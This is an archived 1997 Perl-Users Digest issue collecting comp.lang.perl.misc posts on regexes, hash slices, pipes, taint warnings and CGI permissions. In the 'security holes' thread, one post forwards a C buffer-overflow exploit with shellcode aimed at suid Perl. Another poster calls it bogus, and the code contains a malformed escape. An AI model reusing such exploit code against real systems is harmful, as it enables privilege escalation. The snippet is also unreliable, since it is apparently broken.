[7175] in Perl-Users-Digest
Perl-Users Digest, Issue: 800 Volume: 8
daemon@ATHENA.MIT.EDU (Perl-Users Digest)
Thu Jul 31 14:22:08 1997
Date: Thu, 31 Jul 97 11:00:23 -0700
From: Perl-Users Digest <Perl-Users-Request@ruby.OCE.ORST.EDU>
To: Perl-Users@ruby.OCE.ORST.EDU (Perl-Users Digest)
Perl-Users Digest Thu, 31 Jul 1997 Volume: 8 Number: 800
Today's topics:
==>>COMPUTER HARDWARE / SOFTWARE <<== "AUCTION !" software@auction-discounts1.com
Re: [Q] Can you generate "page.html#bottom" in PERL? <rootbeer@teleport.com>
Re: [Q] Pattern matching syntax <rootbeer@teleport.com>
Re: Comm.pl doesn't work, need a VTLS front-end (Matthew H. Gerlach)
Re: comment (Tad McClellan)
comments in regular expressions (wish list) (Dennis Grinberg)
Re: Communication between parent and child (David Bonner)
Re: Idea for a New Perl Book (Tung-chiang Yang)
Re: Insecure path warnings with -T despite $ENV{PATH} r <rootbeer@teleport.com>
locking <tel@vd.dk>
locking <tel@vd.dk>
long regular expressions (Dennis Grinberg)
Re: Net::FTP documentation and examples <rootbeer@teleport.com>
Re: Nifty hash initialization, but why? <rootbeer@teleport.com>
Re: Parsing line by line MChing@POBoxes.com
Perl compiler & setuid scripts <dan@clockwork.net>
Permissions for creating dir <gbraz@dcc.ufmg.br>
Reading from pipes <helmrl@aur.alcatel.com>
Re: Reading from pipes (robert)
rewrite rwall dellis@frycomm.com
Re: security holes in perl 5.00401 @_@ (Gil)
Re: security holes in perl 5.00401 @_@ (Gil)
Re: security holes in perl 5.00401 @_@ (Gil)
Re: Splitting a filename (Eric Bohlman)
Re: Too many people in this group are arrogant #*(@# (R (I R A Aggie)
Digest Administrivia (Last modified: 8 Mar 97) (Perl-Users-Digest Admin)
----------------------------------------------------------------------
Date: Thu, 31 Jul 1997 12:57:01 -0700
From: "AUCTION !" software@auction-discounts1.com
Subject: ==>>COMPUTER HARDWARE / SOFTWARE <<==
Message-Id: <310797125701@auction-discounts1.com>
>>> C O M P U T E R H A R D W A R E / S O F T W A R E <<<
>>> U P T O 90 % O F F R E T A I L <<<
http://www.a-world.com
------------------------------
Date: Thu, 31 Jul 1997 08:12:45 -0700
From: Tom Phoenix <rootbeer@teleport.com>
To: bowker@iNetWebInc.com
Subject: Re: [Q] Can you generate "page.html#bottom" in PERL?
Message-Id: <Pine.GSO.3.96.970731075317.20106N-100000@kelly.teleport.com>
On Wed, 30 Jul 1997 bowker@iNetWebInc.com wrote:
> Seems I stated my question badly ... what I'm trying to do is not just
> generate HTML code from a PERL script (thanks, Stefan, that IS
> elementary), but to force the user's browser to display the code I
> generate starting at the point half-way down the page (thanks, Tom, I
> believe that IS a PERL question).
Please take this in the friendly and cooperative spirit in which it is
offered: I'm willing to let you convince me that this is a Perl question.
If any programming language can send some text which makes a browser do
something, then Perl can send that same text and make the browser do the
same thing. If the question is asking what to print, then it's either an
HTML question or a browser question, isn't it?
> I would like the words "Bye-bye" to appear at the top of the visitor's
> display:
>
> #/usr/bin/perl
> $var = $full_screen_of_text;
> print <<"END";
> <HTML><BODY>
> $var
> <a NAME="bottom">Bye-bye</a>
> </BODY></HTML>
> END
That looks like valid Perl, so I don't think you have a problem with Perl.
You either want to change the way the browser works (which is a browser
problem) or you want to put different text in the print statement (which
is an HTML problem). Since there are newsgroups about browsers and about
HTML, you're likely to get a better and more complete answer in one of
those than you can get in a Perl newsgroup. (The folks there may tell you
to redirect the browser to a URL which includes the internal link you
used. They may also tell you that this may not be possible with some
browsers.)
I sincerely wish you the best of luck in getting your code to do what you
want!
--
Tom Phoenix http://www.teleport.com/~rootbeer/
rootbeer@teleport.com PGP Skribu al mi per Esperanto!
Randal Schwartz Case: http://www.rahul.net/jeffrey/ovs/
------------------------------
Date: Thu, 31 Jul 1997 08:36:32 -0700
From: Tom Phoenix <rootbeer@teleport.com>
To: Adam Grayson <dyrewolf@worldnet.att.net>
Subject: Re: [Q] Pattern matching syntax
Message-Id: <Pine.GSO.3.96.970731083149.20106S-100000@kelly.teleport.com>
On Wed, 30 Jul 1997, Adam Grayson wrote:
> I want to run a pattern matching function on an array variable, the name
> of which is @cover[$i]. Not sure if that is correct to start with. Can I
> run /@cover[$i]/ to search for that string in a text line?
Do you mean that the $i element of @cover has a string for which you want
to search? First, that element is $cover[$i], not @cover[$i], and Perl
will usually warn you about that if you ask it to, with -w.
But you can search with the pattern /$cover[$i]/, although it may be
desirable to use /o. (See the docs for details on /o and why you might or
might not want to use it.) It's also possible that you want /\Q$cover[$i]/
or /\$cover\[\$i\]/, if I've misunderstood your question, but the docs
(or empirical evidence :-) should tell you what you need.
> Another question: can "&" be used as a regular ASCII character, say to
> break up a text line that has the strings connected by an ampersand?
Yes; it doesn't need to be escaped in a regular expression. (Is that what
you were asking?) But there may happen to be a module which will do what
you want. :-)
Hope this helps!
--
Tom Phoenix http://www.teleport.com/~rootbeer/
rootbeer@teleport.com PGP Skribu al mi per Esperanto!
Randal Schwartz Case: http://www.rahul.net/jeffrey/ovs/
------------------------------
Date: Thu, 31 Jul 1997 14:58:12 GMT
From: gerlach@netcom.com (Matthew H. Gerlach)
Subject: Re: Comm.pl doesn't work, need a VTLS front-end
Message-Id: <gerlachEE6ux0.50B@netcom.com>
In article <slrn45u0d2f.eh6.samiss@assari.cc.tut.fi> samiss@assari.cc.tut.fi (Sami Sandqvist) writes:
>I am trying to write a Perl script to use a VTLS library database with
>telnet. The FAQ pointed me to Comm.pl for expect-like functionality, but
>it seems to be written in perl4 and even the example programs don't run.
>I have some experience with Perl and I don't think I broke the examples. I
>only changed the hostname, username and password(for the simple telnet
>client example). I am using perl 5.004. What now?
>
Just because Comm.pl is written to support perl 4 doesn't mean that it
cannot be run under perl 5. In fact I run it all the time with Perl 5.003
under SunOS and SCO 3.2.4. What version of UNIX are you working with?
Have you looked into NET::Telnet?
Matthew
------------------------------
Date: Wed, 30 Jul 1997 13:25:27 -0500
From: tadmc@flash.net (Tad McClellan)
Subject: Re: comment
Message-Id: <nu0or5.1c2.ln@localhost>
Tom Phoenix (rootbeer@teleport.com) wrote:
: On 29 Jul 1997, John Liao wrote:
: > Is there a equivalent /* */ for comments in perl?
: No and yes. :-)
: No, Perl doesn't have a way to comment-out blocks of text or to insert
: comments within a line.
: But yes, if you're tricky enough you can effectively make nearly anything
: a comment in Perl. Here's one way. This is not guaranteed to contribute to
^^^^^^^^^^^^^^
: the readability of your script, of course. :-)
: 'ignore this text' if <<'COMMENTED_OUT';
: Anything goes here...
: COMMENTED_OUT
And here's another way:
=pod
Anything goes here...
=cut
;-)
Which, of course, messes things up if you actually have pod
documentation in your script...
--
Tad McClellan SGML Consulting
Tag And Document Consulting Perl programming
tadmc@flash.net
------------------------------
Date: 31 Jul 1997 15:03:58 GMT
From: dennis@cs.cmu.edu (Dennis Grinberg)
Subject: comments in regular expressions (wish list)
Message-Id: <5rq9gu$oki$1@goldenapple.srv.cs.cmu.edu>
If wishes could come true...
I find that comments in regular expressions have only limited usefulness,
namely commenting the regular expression. I would like a more general
mechanism that allows one to attach attributes to certain portions
of the expression. If the portion of the regular expression corresponding
to an attribute was matched, the attributes would be consulted/executed/etc.
Of course this could only take place after the entire string was matched.
A simple application using this mechanism would print the portions of
the regular expression that caused the match. While one could achieve
this result running over all registers, the attribute mechanism would
be much cleaner from a user point of view.
--
Dennis Grinberg dennis@cs.cmu.edu
Carnegie Mellon Computer Science http://www.cs.cmu.edu/~dennis/
5000 Forbes Avenue Phone: (412) 421-4293
Pittsburgh, PA 15213-3891 FAX: (412) 268-5576
------------------------------
Date: 31 Jul 1997 13:48:01 GMT
From: davidb@news.kenan.com (David Bonner)
Subject: Re: Communication between parent and child
Message-Id: <5rq52h$pq@pony.kenan.com>
Sun Jian (eng50636@leonis.nus.sg) wrote:
: Hi,
: I have a parent process who creates a child process.
: In my program, there is a variable $flag. When the value
: of $flag is changed in the child process, it seems that
: the parent process doesn't know and it still sees $flag
: with its original value. I would like to know what is the
: easiest method for the parent and the child to 'share' the
: variable so that when it's changed in either process, the
: other process is able to see the change immediately.
When you fork off a child process, a copy of the parent
is made in memory. That means that each process has its own
copy of $flag. The only way to communicate changes is by using
some form of inter-procees communication (IPC).
Check the PERLIPC perldocs for more details on this.
--
#==========================================================================#
#"it's the word's suppression that gives it the power, | david bonner #
# the violence, the viciousness" - lenny bruce | dbonner@cs.bu.edu #
#==========================================================================#
------------------------------
Date: Thu, 31 Jul 1997 01:29:31 GMT
From: tcyang@netcom.com (Tung-chiang Yang)
Subject: Re: Idea for a New Perl Book
Message-Id: <tcyangEE5tH7.s0@netcom.com>
Someone did say that, but I hope your post will not push him back to
the cave :)
========================================
ldanna@hotmail.com wrote after kicking bad guys out of Air Force One:
: Cool, when will it be published?
: BTW: I thought Tom C didn't read this group... well thats
: what someone said a while ago.
--
====== Try the low-crossposting robomoderated 'alt.culture.taiwan' ======
soc.culture.taiwan, soc.culture.china (by SCC FAQ Team) FAQ's:
http://www.iglou.com/tcyang/Taiwan_faq.shtml, China_faq.shtml
------------------------------
Date: Thu, 31 Jul 1997 08:30:26 -0700
From: Tom Phoenix <rootbeer@teleport.com>
To: "Eric D. Friedman" <friedman@uci.edu>
Subject: Re: Insecure path warnings with -T despite $ENV{PATH} restrictions
Message-Id: <Pine.GSO.3.96.970731081942.20106R-100000@kelly.teleport.com>
On 30 Jul 1997, Eric D. Friedman wrote something like:
> Does anyone know why the following produces a warning that reads
> "Insecure $ENV{PATH} while running with -T switch" for a system call
> with an absolute path, no arguments, and no variables in a script whose
> PATH has been restricted explicitly:
>
> $ENV{PATH} = '/usr/ucb:/bin:/usr/bin'; # Restrict path
Could one of those directories be writable by non-root users? I believe
that that could cause that same message. (Among other problems...! :-)
Hope this helps!
--
Tom Phoenix http://www.teleport.com/~rootbeer/
rootbeer@teleport.com PGP Skribu al mi per Esperanto!
Randal Schwartz Case: http://www.rahul.net/jeffrey/ovs/
------------------------------
Date: Wed, 30 Jul 1997 12:10:21 +0200
From: Torben Eilskov Leth <tel@vd.dk>
Subject: locking
Message-Id: <33DF130D.1A6B47FF@vd.dk>
Hi!
Does anyone know if it still isn't possible to lock dbm files opened
with dbmopen?
Thanks !
Torben Eilskov Leth tel@kampsax.dk
------------------------------
Date: Wed, 30 Jul 1997 12:10:08 +0200
From: Torben Eilskov Leth <tel@vd.dk>
Subject: locking
Message-Id: <33DF1300.EFC81BE3@vd.dk>
Hi!
Does anyone know if it still isn't possible to lock dbm files opened
with dbmopen?
Thanks !
Torben Eilskov Leth
------------------------------
Date: 31 Jul 1997 14:58:16 GMT
From: dennis@cs.cmu.edu (Dennis Grinberg)
Subject: long regular expressions
Message-Id: <5rq968$og7$1@goldenapple.srv.cs.cmu.edu>
In some work I'm doing I am generating extremely long regular expressions.
They aren't that complicated and probably don't require too much
backtracking so I'm not very concerned about speed issues. The problem
is that I've run up against the length limitations Perl imposes on
regular expressions. (The problem is that in Perl uses 2 byte offsets
in compiled regular expressions.) Has anyone successfully made the
modifications to allow for longer regular expressions?
[As a side note, gnu regular expressions also have this limitation and
they also limit the number of registers to 255. The new rx regular expression
package by Tom Lord seems to overcome some of these limitations but it
is still buggy.]
--
Dennis Grinberg dennis@cs.cmu.edu
Carnegie Mellon Computer Science http://www.cs.cmu.edu/~dennis/
5000 Forbes Avenue Phone: (412) 421-4293
Pittsburgh, PA 15213-3891 FAX: (412) 268-5576
------------------------------
Date: Thu, 31 Jul 1997 08:42:49 -0700
From: Tom Phoenix <rootbeer@teleport.com>
To: keys@zahadum.org
Subject: Re: Net::FTP documentation and examples
Message-Id: <Pine.GSO.3.96.970731084104.20106T-100000@kelly.teleport.com>
On Wed, 30 Jul 1997, Keys wrote:
> I have read the pod (which is why I turned to clp.misc), and found
> little more than a basic sample script and vague instructions for
> advanced features... Does anyone know if the author (or anyone else)
> has a webpage with more detail?
I hope not. :-) If there is any better documentation than that which
comes with a module, it should probably be distributed with the module. On
the other hand, authors are sometimes too busy to properly document every
way of using a module, so if you discover additional helpful examples it
would be good to help the author to incorporate them into the docs. Good
luck!
--
Tom Phoenix http://www.teleport.com/~rootbeer/
rootbeer@teleport.com PGP Skribu al mi per Esperanto!
Randal Schwartz Case: http://www.rahul.net/jeffrey/ovs/
------------------------------
Date: Thu, 31 Jul 1997 07:47:38 -0700
From: Tom Phoenix <rootbeer@teleport.com>
To: "Mark A. Lehmann" <mlehmann@prismnet.com>
Subject: Re: Nifty hash initialization, but why?
Message-Id: <Pine.GSO.3.96.970731073123.20106M-100000@kelly.teleport.com>
On 29 Jul 1997, Mark A. Lehmann wrote:
> I really like this but I don't understand why this works and if it is
> dangerous.
>
> @inputs = qw(first last email);
>
> @{\%values}{@inputs} = qw(Mark Lehmann mlehmann@earthling.net);
Okay, first, let's simplify it a little. That first set of braces has this
{\%values}
Syntactically, that's a block used where you'd expect a variable name.
Such a block is allowed in Perl, and it should (in this case) return a
reference to the variable you want to use. Here it's returning a reference
to %values (although the author's motive for doing this is not at all
obvious), so we could simplify that line like this.
@values{@inputs} = qw(Mark Lehmann mlehmann@earthling.net);
The expression on the left is the syntax for a hash slice. The curly
braces tell us that it's referring to a hash variable (%values), and the
@-sign in front says that we're working with multiple elements, instead of
just one. (That is to say, the subscript is in a list context instead of a
scalar context, and so is the RHS of the assignment.)
A slice is a simply shortcut for a list. These two are equivalent.
($foo[1], $foo[80], $foo[7])
@foo[1, 80, 7]
As are these.
($foo{one}, $foo{eighty}, $foo{seven})
@foo{qw(one eighty seven)}
A slice is most useful when the subscripts are in a list variable or list
expression. For example...
@big{ keys %little } = values %little; # merge %little into %big
That merges the %little hash into the %big one, which can be useful for
setting default arguments, among other things. If %little had had the
entry $little{fred} = 'flintstone', now we know that %big has 'flintstone'
in $big{fred}.
As to whether it's dangerous, I'll say it's no more dangerous than any
other Perl syntax. Of course, that means that you should be careful! :-)
Hope this helps!
--
Tom Phoenix http://www.teleport.com/~rootbeer/
rootbeer@teleport.com PGP Skribu al mi per Esperanto!
Randal Schwartz Case: http://www.rahul.net/jeffrey/ovs/
------------------------------
Date: Wed, 30 Jul 97 20:09:40 -0800
From: MChing@POBoxes.com
Subject: Re: Parsing line by line
Message-Id: <MChing870318580@forumsweb.com>
Not sure I understand you, but this is what I would do...
open (FIN, "filename");
$buf="";
while (<FIN>)
if (/pattern to search for/) {
$buf.=$_;
}
}
this way it only keeps the lines that you want.
"Junaid Shah [C]" <shahjn@cig.mot.com> wrote:
>
> Hi,
>
> I would like to parse a file process each line and before reading the
> next line be able to delete the current line from the file. Only I don't
> know how to go about doing it.
>
> Many Thanks...
>
> ps: I know how to parse line by line it's the deleting part that I do
> not know...
>
> --
> ----------------------------------------------------------
> Junaid Shah Ph:(847)632-7040 Fax:(847)632-6733
> Enabling Technologies, Motorola Inc.
> ----------------------------------------------------------
-------------------------- http://forumsweb.com -------------------------
Free private/public online conferencing and Usenet newsgroups
------------------------------
Date: Thu, 31 Jul 1997 10:37:22 -0500
From: "Dan Brian" <dan@clockwork.net>
Subject: Perl compiler & setuid scripts
Message-Id: <5rqbaj$jfo@hurricane.jriver.com>
I am having trouble compiling setuid scripts with the Perl compiler. The
compiler uses the "-e" perl command line arg with its "fakeargs", and perl
(at least my perl - 5.004 on Linux and BSDOS) won't allow the resulting
executable to be executed setuid. Any ideas?
Regards,
Dan Brian
dan@clockwork.net
------------------------------
Date: Tue, 29 Jul 1997 17:18:04 -0300
From: Guilherme Braz de Carvalho <gbraz@dcc.ufmg.br>
Subject: Permissions for creating dir
Message-Id: <Pine.SOL.3.96.970729171341.15115B-100000@turmalina>
Hi there !
How can I do to allow my cgi script to create a dir ? If I only type "
system ("/usr/bin/mkdir $name"); " I got a system error. I think that it's
because of the user acess to my system whith his permissions... How can I
do ?
Thanx
Bye,
---------------------------------
| Guilherme Braz de Carvalho |
| gbraz@dcc.ufmg.br |
| http://www.dcc.ufmg.br/~gbraz |
---------------------------------
------------------------------
Date: Thu, 31 Jul 1997 10:03:33 -0400
From: "Ron L. Helms" <helmrl@aur.alcatel.com>
Subject: Reading from pipes
Message-Id: <33E09B35.41C67EA6@aur.alcatel.com>
I blessed my IO::Pipe to IO::Handle and used $fh->getline to read from a
pipe. When I know I am sending info (first time), I send "last" as the
last argument of an array, and the while loop around $fh->getline exits.
My problem is I need to check at various intervals if there is new info
on the pipe I need to read. The second time I call $fh->getline, my
program hangs because there is no new data on the pipe, but $fh->getline
is still looking for it.
Is there a way to timeout the process (hopefully not SIGS{}) or test the
pipe to see if there is data on it before I call $fh->getline?
Any and all help will be greatly appreciated.
Ron Helms
helmrl@aur.alcatel.com
rhelms@pagesz.net
------------------------------
Date: 31 Jul 1997 16:54:52 +0200
From: robert@ICK.il.fontys.nl (robert)
Subject: Re: Reading from pipes
Message-Id: <5rq8vs$1kh@bsd1.hqehv-internal.ilse.net>
"Ron L. Helms" <helmrl@aur.alcatel.com>:
>Is there a way to timeout the process (hopefully not SIGS{}) or test the
>pipe to see if there is data on it before I call $fh->getline?
Take a look at IO::Select, which seems to be able to do exactly what you
want.
robert
------------------------------
Date: Thu, 31 Jul 1997 10:39:18 -0600
From: dellis@frycomm.com
Subject: rewrite rwall
Message-Id: <870361833.17215@dejanews.com>
I have an idea: why doesn't someone rewrite the rwall utility in
perl and rename it lwall?
Sorry if this has been suggested before.
+----------------------------------------------------------------------+
| Daniel Ellis I'm going off the rails ||||||| My opinions are |
| dellis@frycomm.com on a crazy train ( O O ) not my employers'|
+---------------------------------------oOOo---U---oOOo----------------+
-------------------==== Posted via Deja News ====-----------------------
http://www.dejanews.com/ Search, Read, Post to Usenet
------------------------------
Date: Thu, 31 Jul 1997 13:51:17 GMT
From: mingtian@hotmail.com (Gil)
Subject: Re: security holes in perl 5.00401 @_@
Message-Id: <33e09813.1016165@usenet.kornet.nm.kr>
>Then what the hell was the subject line talking about?
at first, the sys admin told me it was perl 5.004_01 .. :)
>There is a known hole in Perl 5.003's suid Perl used to implement suid
>Perl scripts on hosts without safe shell scripts. The solution is to
>upgrade to 5.004, in which this hole has been patched, or apply the
>patches to 5.003 on CPAN.
how about 5.002?
...
Gil
Homepage: http://soback.kornet.nm.kr/~chlang/
">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">
!F 1W4k 3*?!0T4B >pA&3* GQ<[@L 2I@L?4@84O 0q8q1f 59>F3*?@4B !F
"> 594c ?6?!<- H/Hw 9L<RA~0m @V4B 5i2I GQ<[@L?M55 00>F ">
!F H%@Z@V>n >5>5GQ 3*@G 0!=??! Hq8A@; @|GXAV4x 2I !F
!F "4^7!<- >HAV8i ;/>n6s" !F
">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">
------------------------------
Date: Thu, 31 Jul 1997 14:07:13 GMT
From: mingtian@hotmail.com (Gil)
Subject: Re: security holes in perl 5.00401 @_@
Message-Id: <33e19938.1310033@usenet.kornet.nm.kr>
Russ Allbery <rra@stanford.edu> wrote:
>Gil <mingtian@hotmail.com> writes:
>
>> he sent me one mail that my chat script was the seed calling the hacker
>> due to FreeBSD's security hole,
>
>Someone's having a great deal of fun with you.
this is the brief story,
one copied my web chat source in her user directory and run perl 5.003
that the sys admin did not want to have, he said it was his mistake to leave
it, he did not removed it and opend the permission as well, he said there is perl 4.x.
anyway, the perl script called perl 5.003 about 8 times during the struggling to
install the perl, but it did not print the result to netscape but it showed the source itself.
i told her to ask the sys admin, after about 2 or 3 days, /bin/sh was deleted by hacker.
the sus admin said he was trying to find why it did not show properly with netscape..
so he seems to use perl 5.004_01 thinking it might be the problem of lower version..
or whatever.. anyway, after 6 hours he tested it with perl 5.004_01, the system
is hacked.
he's thinking that the script called the hacker when perl 5.003 was run few times..
>> please read the following..
>
>[snip standard buffer exploit down to...]
>
>> execl("/usr/bin/sperl5.00403",
>> "/usr/bin/sperl5.00403", buf, NULL);
>> }
>
>sperl5.00403 doesn't exist anywhere. That would be Perl 5.004_03, and
>5.004_02 is the latest version (and that's just a limited distribution for
>initial testing purposes at this point).
>
>Someone's lying to you.
i hope so :)
...
Gil
Homepage: http://soback.kornet.nm.kr/~chlang/
">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">
!F 1W4k 3*?!0T4B >pA&3* GQ<[@L 2I@L?4@84O 0q8q1f 59>F3*?@4B !F
"> 594c ?6?!<- H/Hw 9L<RA~0m @V4B 5i2I GQ<[@L?M55 00>F ">
!F H%@Z@V>n >5>5GQ 3*@G 0!=??! Hq8A@; @|GXAV4x 2I !F
!F "4^7!<- >HAV8i ;/>n6s" !F
">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">
------------------------------
Date: Thu, 31 Jul 1997 01:40:29 GMT
From: mingtian@hotmail.com (Gil)
Subject: Re: security holes in perl 5.00401 @_@
Message-Id: <33e0ecbc.2267845@usenet.kornet.nm.kr>
>I and he also don't know, he had Perl 5.003 and there were two web chat
>Perl script that is using META tag to reload and print to the browser.
>
>and what he dubious is that that chat script called /usr/local/bin/perl (perl 5.003)
>and due to perl 5.003's security hole it called the hacker
>
>the chat script seems called /user/local/bin/perl less than 20 times total
>before the system is hacked,
>
>the chat script is here,
>http://soback.kornet.nm.kr/~chlang
he sent me one mail that my chat script was the seed calling
the hacker due to FreeBSD's security hole,
please read the following..
--
---------- Forwarded message ----------
Date: Wed, 30 Jul 1997 14:44:02 -0400
From: Patrick Gilbert
Subject: Re: security hole in FreeBSD
At 17:27 97-07-28 -0700, you wrote:
> Just a update on how the break-in was done after the hacker was
>confronted on irc.
>
> Apparently FreeBSD ships with .rhosts in the root account. Using
>this and perl5.00401, the user was able to rlogin onto the other machine
>without using a password.
After a brief discussion with TheCa on Efnet, he dcc'd me his famous
exploit for a transcript of his brief moment of fame on this discussion
list. he also mentioned he was port sniffing the machine and some luser
just put a cgi-bin chatroom on the machine. he really thinks the author
of the chatroom is a fool.
/* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl
exploit by Ovx */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define
BUFFER_SIZE 1400
#define OFFSET 600
char *get_esp(void) {
asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];
main(int argc, char
*argv[])
{
int i;
char execshell[] =
"\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
for(i=0+1;i<BUFFER_SIZE-4;i+=4)
*(char **)&buf[i] = get_esp() -
OFFSET;
memset(buf,0x90,768+1);
memcpy(&buf[768+1],execshell,strlen(execshell));
buf[BUFFER_SIZE-1]=0;
execl("/usr/bin/sperl5.00403",
"/usr/bin/sperl5.00403", buf, NULL);
}
Bah.
Patrick
...
Gil
Homepage: http://soback.kornet.nm.kr/~chlang/
">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">
!F 1W4k 3*?!0T4B >pA&3* GQ<[@L 2I@L?4@84O 0q8q1f 59>F3*?@4B !F
"> 594c ?6?!<- H/Hw 9L<RA~0m @V4B 5i2I GQ<[@L?M55 00>F ">
!F H%@Z@V>n >5>5GQ 3*@G 0!=??! Hq8A@; @|GXAV4x 2I !F
!F "4^7!<- >HAV8i ;/>n6s" !F
">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">!%">
------------------------------
Date: Thu, 31 Jul 1997 01:22:53 GMT
From: ebohlman@netcom.com (Eric Bohlman)
Subject: Re: Splitting a filename
Message-Id: <ebohlmanEE5t65.KCn@netcom.com>
Terje Br}ten (terjebr@pvv.ntnu.no) wrote:
: "Daniel GUEGUEN" <daniel.gueguen@elantiel.fr> writes:
: > I don't find the solution to split a file name :
: >
: > Example :
: > $FicName = '<../data/customer.txt';
: > ...
: > ($Name,$Extension) = split(/here is the problem.../,$FicName);
: > $Extension must countain 'txt' and $Name the rest of the string.
: >
: ($Name,$Extension) = $FicName =~ m/^(.*)\.(\w*)$/;
It's probably better to get in the habit of using File::Basename. Less
chances of re-inventing the square wheel when you're in a hurry.
------------------------------
Date: Thu, 31 Jul 1997 09:51:56 -0500
From: fl_aggie@hotmail.com (I R A Aggie)
Subject: Re: Too many people in this group are arrogant #*(@# (Re: Checking for valid Email...)
Message-Id: <fl_aggie-ya02408000R3107970951560001@news.fsu.edu>
In article <8cen8g172x.fsf@gadget.cscaper.com>, Randal Schwartz
<merlyn@stonehenge.com> wrote:
+ Newsreaders (not all-singing, all-dancing, web-news-mail-clock
+ browsers) came presubscribed with news.announce.newusers, and most (if
+ not all) were told to read *every* article in there before posting
+ *anything*.
Well, our SGI version of that particular browser has pre-subscribed
news.announce.newusers, news.newusers.questions, and news.answers.
But the mac version 3.0 didn't have it (not sure if was shipped that
way, or if I'd done something), and I couldn't figure out how to invoke
the newsreader in the mac version 4 of the beast. This is a Good Thing.
Tho I did notice that it came preconfigured with a "compose in html" as
the default... :(
James
--
Consulting Minister for Consultants, DNRC
Support the anti-Spam amendment <url:http://www.cauce.org/>
To cure your perl CGI problems, please look at:
<url:http://www.perl.com/perl/faq/idiots-guide.html>
------------------------------
Date: 8 Mar 97 21:33:47 GMT (Last modified)
From: Perl-Request@ruby.oce.orst.edu (Perl-Users-Digest Admin)
Subject: Digest Administrivia (Last modified: 8 Mar 97)
Message-Id: <null>
Administrivia:
The Perl-Users Digest is a retransmission of the USENET newsgroup
comp.lang.perl.misc. For subscription or unsubscription requests, send
the single line:
subscribe perl-users
or:
unsubscribe perl-users
to almanac@ruby.oce.orst.edu.
To submit articles to comp.lang.perl.misc (and this Digest), send your
article to perl-users@ruby.oce.orst.edu.
To submit articles to comp.lang.perl.announce, send your article to
clpa@perl.com.
To request back copies (available for a week or so), send your request
to almanac@ruby.oce.orst.edu with the command "send perl-users x.y",
where x is the volume number and y is the issue number.
The Meta-FAQ, an article containing information about the FAQ, is
available by requesting "send perl-users meta-faq". The real FAQ, as it
appeared last in the newsgroup, can be retrieved with the request "send
perl-users FAQ". Due to their sizes, neither the Meta-FAQ nor the FAQ
are included in the digest.
The "mini-FAQ", which is an updated version of the Meta-FAQ, is
available by requesting "send perl-users mini-faq". It appears twice
weekly in the group, but is not distributed in the digest.
For other requests pertaining to the digest, send mail to
perl-users-request@ruby.oce.orst.edu. Do not waste your time or mine
sending perl questions to the -request address, I don't have time to
answer them even if I did know the answer.
------------------------------
End of Perl-Users Digest V8 Issue 800
*************************************
